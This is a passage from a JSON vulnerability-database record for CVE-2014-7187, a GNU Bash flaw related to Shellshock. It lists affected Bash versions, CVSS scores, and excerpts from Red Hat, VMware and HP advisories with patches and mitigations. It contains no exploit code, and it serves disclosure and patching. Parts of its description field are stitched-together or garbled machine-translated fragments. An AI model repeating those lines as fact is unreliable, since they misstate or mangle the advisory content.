"CNNVD-201409-1073" }, { "db": "NVD", "id": "CVE-2014-7187" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:gnu:bash:1.14.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:1.14.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.04:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.05:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:4.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:4.0:rc1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:1.14.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:1.14.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.01.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.02:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:3.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:3.0.16:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:3.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:4.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:1.14.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.01:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.05:a:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.05:b:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:4.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:4.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:1.14.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:1.14.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.02.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.03:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:3.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:3.2.48:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-7187" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "HP", "sources": [ { "db": "PACKETSTORM", "id": "130988" }, { "db": "PACKETSTORM", "id": "128864" }, { "db": "PACKETSTORM", "id": "128752" }, { "db": "PACKETSTORM", "id": "128666" }, { "db": "PACKETSTORM", "id": "129264" }, { "db": "PACKETSTORM", "id": "128763" }, { "db": "PACKETSTORM", "id": "129095" }, { "db": "PACKETSTORM", "id": "130335" }, { "db": "PACKETSTORM", "id": "128755" } ], "trust": 0.9 }, "cve": "CVE-2014-7187", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Complete", "baseScore": 10.0, "confidentialityImpact": "Complete", "exploitabilityScore": null, "id": "CVE-2014-7187", "impactScore": null, "integrityImpact": "Complete", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "IPA", "availabilityImpact": "Complete", "baseScore": 10.0, "confidentialityImpact": "Complete", "exploitabilityScore": null, "id": "JVNDB-2014-000126", "impactScore": null, "integrityImpact": "Complete", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-7187", "trust": 1.8, "value": "HIGH" }, { "author": "IPA", "id": "JVNDB-2014-000126", "trust": 0.8, "value": "High" }, { "author": "CNNVD", "id": "CNNVD-201409-1073", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULMON", "id": "CVE-2014-7187", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-7187" }, { "db": "JVNDB", "id": "JVNDB-2014-004433" }, { "db": "JVNDB", "id": "JVNDB-2014-000126" }, { "db": "CNNVD", "id": "CNNVD-201409-1073" }, { "db": "NVD", "id": "CVE-2014-7187" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Off-by-one error in the read_token_word function in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via deeply nested for loops, aka the \"word_lineno\" issue. QNAP Systems, Inc. Provided by QTS teeth, Turbo NAS for OS is. QTS for, GNU Bash Vulnerability (JVNVU#97219505) caused by OS Command injection vulnerability (CWE-78) Exists. This vulnerability information is based on the Information Security Early Warning Partnership. IPA Report to JPCERT/CC Coordinated with the developer. Reporter : University of Electro-Communications Wakisaka Yuki MrAny application permission OS The command may be executed. \nAn attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. \nGNU Bash 3.2 and later are vulnerable; prior versions may also be affected. \n\n HP StoreEver ESL E-series Tape Library\n\n - Disable DHCP and only use static IP addressing. \n\n HP Virtual Library System (VLS)\n\n - Disable DHCP and only use static IP addressing. \n\nThis vulnerability allows users that have been granted access to a shell\nscript to escalate privilege and execute unrestricted commands at the same\nsecurity level as the Bash script. \n\nOpen the PXE Configuration Utility on the HP Insight Control server\ndeployment window\nSelect Linux Managed from the Boot Menu options\nClick the Edit button. Clicking the Edit button displays the Edit Shared Menu\nOption window\nUncheck the x86 option in Operating System and Processor Options and click\nOK. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: bash security update\nAdvisory ID: RHSA-2014:1311-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2014-1311.html\nIssue date: 2014-09-26\nCVE Names: CVE-2014-7169 CVE-2014-7186 CVE-2014-7187 \n=====================================================================\n\n1. Summary:\n\nUpdated bash packages that fix one security issue are now available for Red\nHat Enterprise Linux 4 Extended Life Cycle Support, Red Hat Enterprise\nLinux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support,\nRed Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat\nEnterprise Linux 6.4 Extended Update Support. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available from the CVE link in the\nReferences section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux AS (v. 4 ELS) - i386, ia64, x86_64\nRed Hat Enterprise Linux AUS (v. 6.2 server) - x86_64\nRed Hat Enterprise Linux Compute Node Optional EUS (v. 6.4) - x86_64\nRed Hat Enterprise Linux ES (v. 4 ELS) - i386, x86_64\nRed Hat Enterprise Linux EUS (v. 5.9 server) - i386, ia64, ppc, s390x, x86_64\nRed Hat Enterprise Linux HPC Node EUS (v. 6.4) - x86_64\nRed Hat Enterprise Linux LL (v. 5.6 server) - i386, ia64, x86_64\nRed Hat Enterprise Linux Server EUS (v. 6.4) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 6.2) - x86_64\nRed Hat Enterprise Linux Server Optional EUS (v. 6.4) - i386, ppc64, s390x, x86_64\n\n3. Description:\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux. \n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create Bash functions as environment variables\nneed to be made aware of the changes to the way names are handled by this\nupdate. For more information see the Knowledgebase article at\nhttps://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use \"yum update\" within their containers,\nand to commit the resulting changes. \n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article. \n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata \nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at \nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1146319 - CVE-2014-7169 bash: code execution via specially-crafted environment (Incomplete fix for CVE-2014-6271)\n\n6. Package List:\n\nRed Hat Enterprise Linux AS (v. 4 ELS):\n\nSource:\nbash-3.0-27.el4.4.src.rpm\n\ni386:\nbash-3.0-27.el4.4.i386.rpm\nbash-debuginfo-3.0-27.el4.4.i386.rpm\n\nia64:\nbash-3.0-27.el4.4.i386.rpm\nbash-3.0-27.el4.4.ia64.rpm\nbash-debuginfo-3.0-27.el4.4.i386.rpm\nbash-debuginfo-3.0-27.el4.4.ia64.rpm\n\nx86_64:\nbash-3.0-27.el4.4.x86_64.rpm\nbash-debuginfo-3.0-27.el4.4.x86_64.rpm\n\nRed Hat Enterprise Linux ES (v. 4 ELS):\n\nSource:\nbash-3.0-27.el4.4.src.rpm\n\ni386:\nbash-3.0-27.el4.4.i386.rpm\nbash-debuginfo-3.0-27.el4.4.i386.rpm\n\nx86_64:\nbash-3.0-27.el4.4.x86_64.rpm\nbash-debuginfo-3.0-27.el4.4.x86_64.rpm\n\nRed Hat Enterprise Linux LL (v. 5.6 server):\n\nSource:\nbash-3.2-24.el5_6.2.src.rpm\n\ni386:\nbash-3.2-24.el5_6.2.i386.rpm\nbash-debuginfo-3.2-24.el5_6.2.i386.rpm\n\nia64:\nbash-3.2-24.el5_6.2.i386.rpm\nbash-3.2-24.el5_6.2.ia64.rpm\nbash-debuginfo-3.2-24.el5_6.2.i386.rpm\nbash-debuginfo-3.2-24.el5_6.2.ia64.rpm\n\nx86_64:\nbash-3.2-24.el5_6.2.x86_64.rpm\nbash-debuginfo-3.2-24.el5_6.2.x86_64.rpm\n\nRed Hat Enterprise Linux EUS (v. 5.9 server):\n\nSource:\nbash-3.2-32.el5_9.3.src.rpm\n\ni386:\nbash-3.2-32.el5_9.3.i386.rpm\nbash-debuginfo-3.2-32.el5_9.3.i386.rpm\n\nia64:\nbash-3.2-32.el5_9.3.i386.rpm\nbash-3.2-32.el5_9.3.ia64.rpm\nbash-debuginfo-3.2-32.el5_9.3.i386.rpm\nbash-debuginfo-3.2-32.el5_9.3.ia64.rpm\n\nppc:\nbash-3.2-32.el5_9.3.ppc.rpm\nbash-debuginfo-3.2-32.el5_9.3.ppc.rpm\n\ns390x:\nbash-3.2-32.el5_9.3.s390x.rpm\nbash-debuginfo-3.2-32.el5_9.3.s390x.rpm\n\nx86_64:\nbash-3.2-32.el5_9.3.x86_64.rpm\nbash-debuginfo-3.2-32.el5_9.3.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node EUS (v. 6.4):\n\nSource:\nbash-4.1.2-15.el6_4.2.src.rpm\n\nx86_64:\nbash-4.1.2-15.el6_4.2.x86_64.rpm\nbash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm\n\nRed Hat Enterprise Linux Compute Node Optional EUS (v. 6.4):\n\nSource:\nbash-4.1.2-15.el6_4.2.src.rpm\n\nx86_64:\nbash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm\nbash-doc-4.1.2-15.el6_4.2.x86_64.rpm\n\nRed Hat Enterprise Linux AUS (v. 6.2 server):\n\nSource:\nbash-4.1.2-9.el6_2.2.src.rpm\n\nx86_64:\nbash-4.1.2-9.el6_2.2.x86_64.rpm\nbash-debuginfo-4.1.2-9.el6_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server EUS (v. 6.4):\n\nSource:\nbash-4.1.2-15.el6_4.2.src.rpm\n\ni386:\nbash-4.1.2-15.el6_4.2.i686.rpm\nbash-debuginfo-4.1.2-15.el6_4.2.i686.rpm\n\nppc64:\nbash-4.1.2-15.el6_4.2.ppc64.rpm\nbash-debuginfo-4.1.2-15.el6_4.2.ppc64.rpm\n\ns390x:\nbash-4.1.2-15.el6_4.2.s390x.rpm\nbash-debuginfo-4.1.2-15.el6_4.2.s390x.rpm\n\nx86_64:\nbash-4.1.2-15.el6_4.2.x86_64.rpm\nbash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 6.2):\n\nSource:\nbash-4.1.2-9.el6_2.2.src.rpm\n\nx86_64:\nbash-debuginfo-4.1.2-9.el6_2.2.x86_64.rpm\nbash-doc-4.1.2-9.el6_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional EUS (v. 6.4):\n\nSource:\nbash-4.1.2-15.el6_4.2.src.rpm\n\ni386:\nbash-debuginfo-4.1.2-15.el6_4.2.i686.rpm\nbash-doc-4.1.2-15.el6_4.2.i686.rpm\n\nppc64:\nbash-debuginfo-4.1.2-15.el6_4.2.ppc64.rpm\nbash-doc-4.1.2-15.el6_4.2.ppc64.rpm\n\ns390x:\nbash-debuginfo-4.1.2-15.el6_4.2.s390x.rpm\nbash-doc-4.1.2-15.el6_4.2.s390x.rpm\n\nx86_64:\nbash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm\nbash-doc-4.1.2-15.el6_4.2.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2014-7169.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-7186.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-7187.html\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/articles/1200223\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFUJau9XlSAg2UNWIIRAhKkAKC931kAxA4S4exwT4uGhDr7uDFIKQCglKKS\nN0AJiOto/RXwBqHtbfr1wkM=\n=SeAK\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Summary\n\n VMware product updates address Bash security vulnerabilities. Relevant Releases (Affected products for which remediation is present)\n\n vCenter Log Insight 2.0\n\n3. Problem Description \n\n a. Bash update for multiple products. \n\n Bash libraries have been updated in multiple products to resolve \n multiple critical security issues, also referred to as Shellshock. \n \n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the identifiers CVE-2014-6271, CVE-2014-7169, \n CVE-2014-7186, and CVE-2014-7187 to these issues. \n\n VMware products have been grouped into the following four\n product categories:\n \n I) ESXi and ESX Hypervisor\n ESXi is not affected because ESXi uses the Ash shell (through\n busybox), which is not affected by the vulnerability reported\n for the Bash shell. See table 1 for\n remediation for ESX. \n \n II) Windows-based products\n Windows-based products, including all versions of vCenter Server \n running on Windows, are not affected. \n\n III) VMware (virtual) appliances\n VMware (virtual) appliances ship with an affected version of Bash. \n See table 2 for remediation for appliances. \n \n IV) Products that run on Linux, Android, OSX or iOS (excluding\nvirtual\n appliances)\n\n Products that run on Linux, Android, OSX or iOS (excluding \n virtual appliances) might use the Bash shell that is part of the\n operating system. VMware recommends that customers\n contact their operating system vendor for a patch. \n \n MITIGATIONS\n\n VMware encourages restricting access to appliances through\n firewall rules and other network layer controls to only trusted IP\n addresses. This measure will greatly reduce any risk to these\n appliances. \n\n RECOMMENDATIONS\n\n VMware recommends customers evaluate and deploy patches for\n affected products in Table 1 and 2 below as these\n patches become available. \n\n Column 4 of the following tables lists the action required to\n remediate the vulnerability in each release, if a solution is\n available. \n\n Table 1 - ESXi and ESX Hypervisor\n =================================\n\n VMware Product Running Replace with/\n Product Version on Apply Patch \n ============== ======= ======= =============\n ESXi any ESXi Not affected\n\n ESX 4.1 ESX Patch pending *\n\n ESX 4.0 ESX Patch pending *\n\n * VMware will make VMware ESX 4.0 and 4.1 security patches available \n for the Bash shell vulnerability. This security patch release is an \n exception to the existing VMware lifecycle policy. \n\n Table 2 - Products that are shipped as a (virtual) appliance. \n =============================================================\n\n VMware Product Running Replace with/\n Product Version on Apply Patch \n ============== ======= ======= =============\n \n vCenter Server Appliance 5.x Linux Patch Pending\n Horizon DaaS Platform 6.x Linux Patch Pending\n Horizon Workspace 1.x, 2.x Linux Patch Pending\n IT Business Management Suite 1.x Linux Patch Pending\n NSX for Multi-Hypervisor 4.x Linux Patch Pending\n NSX for vSphere 6.x Linux Patch Pending\n NVP 3.x Linux Patch Pending\n vCenter Converter Standalone 5.x Linux Patch Pending \n vCenter Hyperic Server 5.x Linux Patch Pending\n vCenter Infrastructure Navigator 5.x Linux Patch Pending\n vCenter Log Insight 1.x, 2.x Linux 2.0 U1\n vCenter Operations Manager 5.x Linux Patch Pending\n vCenter Orchestrator Appliance 4.x, 5.x Linux Patch Pending\n vCenter Site Recovery Manager 5.x Linux Patch Pending\n**\n vCenter Support Assistant 5.x Linux Patch Pending\n vCloud Automation Center 6.x Linux Patch Pending\n vCloud Automation Center\n Application Services 6.x Linux Patch Pending\n vCloud Director Appliance 5.x Linux Patch Pending\n vCloud Connector 2.x Linux Patch Pending\n vCloud Networking and Security 5.x Linux Patch Pending\n vCloud Usage Meter 3.x Linux Patch Pending\n vFabric Application Director 5.x, 6.x Linux Patch Pending\n vFabric Postgres 9.x Linux Patch Pending\n Viewplanner 3.x Linux Patch Pending\n VMware Application Dependency \n Planner x.x Linux Patch Pending\n VMware Data Recovery 2.x Linux Patch Pending\n VMware HealthAnalyzer 5.x Linux Patch Pending\n VMware Mirage Gateway 5.x Linux Patch Pending\n VMware Socialcast On Premise x.x Linux Patch Pending\n VMware Studio 2.x Linux Patch Pending\n VMware TAM Data Manager x.x Linux Patch Pending\n VMware Workbench 3.x Linux Patch Pending\n vSphere App HA 1.x Linux Patch Pending\n vSphere Big Data Extensions 1.x, 2.x Linux Patch Pending\n vSphere Data Protection 5.x Linux Patch Pending\n vSphere Management Assistant 5.x Linux Patch Pending\n vSphere Replication 5.x Linux Patch Pending\n vSphere Storage Appliance 5.x Linux Patch Pending\n\n ** This product includes Virtual Appliances that will be updated, the\nproduct \n itself is not a Virtual Appliance. Solution\n\n vCenter Log Insight\n ----------------------------\n Downloads:\n https://www.vmware.com/go/download-vcenter-log-insight\n (click Go to Downloads)\n Documentation:\n http://kb.vmware.com/kb/2091065\n\n5. References\n \n VMware Knowledge Base Article 2090740\n http://kb.vmware.com/kb/2090740\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 , \n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187\n\n- ------------------------------------------------------------------------\n\n6. Change Log\n\n 2014-09-30 VMSA-2014-0010\n Initial security advisory in conjunction with the release of\n vCenter Log Insight 2.0 U1 on 2014-09-30. Contact\n\n E-mail list for product security notifications and announcements:\n http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\n This Security Advisory is posted to the following lists:\n\n security-announce at lists.vmware.com\n bugtraq at securityfocus.com\n fulldisclosure at seclists.org\n\n E-mail: security at vmware.com\n PGP key at: http://kb.vmware.com/kb/1055\n\n VMware Security Advisories\n http://www.vmware.com/security/advisories\n\n VMware Security Response Policy\n https://www.vmware.com/support/policies/security_response.html\n\n VMware Lifecycle Policy\n https://www.vmware.com/support/policies/lifecycle.html\n \n Twitter\n https://twitter.com/VMwareSRC\n\n Copyright 2014 VMware Inc. All rights reserved. \n\nRelease Date: 2014-10-16\nLast Updated: 2014-10-16\n\nPotential Security Impact: Remote unauthorized access\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nA potential security vulnerability has been identified with certain HP\nStoreOnce Backup systems running Bash Shell. However, HP is unaware of any method that would\nallow this vulnerability to be exploited on HP StoreOnce Backup systems but\nis providing an updated version of Bash Shell as a precaution. \n\nReferences:\n\n CVE-2014-7169\n CVE-2014-6271\n CVE-2014-7187\n CVE-2014-7186\n SSRT101749\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP StoreOnce Backup software versions 3.0.0 to 3.11.3. \n\nPlease refer to the RESOLUTION\n section below for a list of impacted products. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-7186 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-7187 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\nHP has made the following updates available to resolve the vulnerability in\nHP StoreOnce Backup systems running Bash Shell. \n\n HP StoreOnce Backup version 3.11.4 for the following products:\n\n Product SKU\n Product Name\n\n BB896A\n HP StoreOnce 6500 Backup\n\n EJ022A\n HP StoreOnce B6200 Backup\n\n BB903A\n HP StoreOnce 4900 Backup\n\n BB877A\n HP StoreOnce 2700 Backup\n\n BB878A\n HP StoreOnce 4500 Backup\n\n BB879A\n HP StoreOnce 4700 Backup\n\n HP StoreOnce 2610 iSCSI Backup system\n\n BB852A\n HP StoreOnce 2620 iSCSI Backup system\n\n BB853A\n HP StoreOnce 4210 iSCSI Backup system\n\n BB854A\n HP StoreOnce 4210 FC Backup system\n\n BB855A\n HP StoreOnce 4220 Backup system\n\n BB856A\n HP StoreOnce 4420 Backup system\n\n BB857A\n HP StoreOnce 4430 Backup system\n\n TC458A/AAE\n HP StoreOnce VSA 10 TB 3 Year Software\n\n D4T77A/AAE\n HP StoreOnce VSA 4 TB 3 Year Software\n\nHISTORY\nVersion:1 (rev.1) - 16 October 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. Relevant releases/architectures:\n\nSJIS (v. \n\nShift_JIS, also known as \"SJIS\", is a character encoding for the Japanese\nlanguage. This package provides bash support for the Shift_JIS encoding. Note that certain services, screen sessions, and tmux sessions may\nneed to be restarted, and affected interactive users may need to re-login. \nInstalling these updated packages without restarting services will address\nthe vulnerability, but functionality may be impacted until affected\nservices are restarted", "sources": [ { "db": "NVD", "id": "CVE-2014-7187" }, { "db": "JVNDB", "id": "JVNDB-2014-004433" }, { "db": "JVNDB", "id": "JVNDB-2014-000126" }, { "db": "CERT/CC", "id": "VU#252743" }, { "db": "BID", "id": "70154" }, { "db": "PACKETSTORM", "id": "130988" }, { "db": "PACKETSTORM", "id": "128864" }, { "db": "PACKETSTORM", "id": "128752" }, { "db": "PACKETSTORM", "id": "128666" }, { "db": "VULMON", "id": "CVE-2014-7187" }, { "db": "PACKETSTORM", "id": "129264" }, { "db": "PACKETSTORM", "id": "128763" }, { "db": "PACKETSTORM", "id": "129095" }, { "db": "PACKETSTORM", "id": "130335" }, { "db": "PACKETSTORM", "id": "128456" }, { "db": "PACKETSTORM", "id": "128517" }, { "db": "PACKETSTORM", "id": "128755" }, { "db": "PACKETSTORM", "id": "129132" } ], "trust": 4.5 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=36933", "trust": 0.2, "type": "exploit" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-7187" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-7187", "trust": 5.6 }, { "db": "CERT/CC", "id": "VU#252743", "trust": 2.8 }, { "db": "JVN", "id": "JVN55667175", "trust": 2.7 }, { "db": "JVNDB", "id": "JVNDB-2014-000126", "trust": 2.7 }, { "db": "OPENWALL", "id": 